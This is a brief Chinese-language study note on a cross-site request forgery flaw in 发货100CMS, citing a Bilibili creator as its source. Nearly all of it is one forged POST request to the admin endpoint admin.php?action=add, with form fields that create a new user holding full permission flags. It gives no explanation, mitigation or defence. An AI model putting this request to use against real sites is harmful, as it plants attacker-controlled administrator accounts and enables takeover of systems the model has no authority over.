【笔记】发货100CMS的CSRF跨站请求伪造

前言

发货100CMS的CSRF跨站请求伪造

添加用户

request
1
2
3
4
POST http://127.0.0.1:80/admin/admin.php?action=add
Content-Type: application/x-www-form-urlencoded

A_login="用户名"&A_pwd="密码"&A_head="nopic.png"&A0_0="1"&A1_0=""&A1_1="1"&A1_2="1"&A1_3="1"&A1_4="1"&A1_5="1"&A2_0="1"&A2_1="1"&A2_2="1"

完成

参考文献

哔哩哔哩——xiaodisec